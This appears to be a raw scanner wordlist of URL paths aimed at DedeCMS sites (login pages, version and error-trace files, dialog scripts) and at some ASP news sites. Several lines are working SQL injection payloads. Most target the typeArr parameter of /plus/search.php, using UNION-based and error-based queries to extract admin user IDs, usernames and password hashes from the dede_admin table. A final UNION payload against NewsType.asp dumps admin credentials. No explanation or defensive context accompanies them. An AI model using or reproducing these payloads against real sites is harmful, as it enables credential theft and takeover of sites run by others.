/dede
/dede/login.php
/data/admin/ver.txt
/include/dialog/select_soft.php
/include/dialog/select_soft.php?activepath=/include/FCKeditor
/data/mysql_error_trace.inc
/plus/flink.php
/plus/mytag_js.php
/include/dialog/select_media.php?f=form1.murl
/include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p
/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a 
/plus/search.php?keyword=11&typeArr[%60@%27%60%20and%28SELECT/**/1%20FROM%28select/**/count%28*%29,concat%28floor%28rand%280%29*2%29,%28SELECT/*%27%27*/concat%280x5f,userid,0x5f,pwd,0x5f%29%20from%20%23@__admin%20Limit%200,1%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29]=1
/plus/search.php?typeArr[1%27%20or%20%60@\%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20pwd%20from%20dede_admin%20limit%201,1%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=11&&kwtype=0&q=1111&searchtype=title
/plus/search.php?typeArr[1%27%20or%20%60@\%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20uname%20from%20dede_admin%20limit%201,1%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=11&&kwtype=0&q=1111&searchtype=title
/Style/news.asp?action=true&RID=1&ID=1
/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='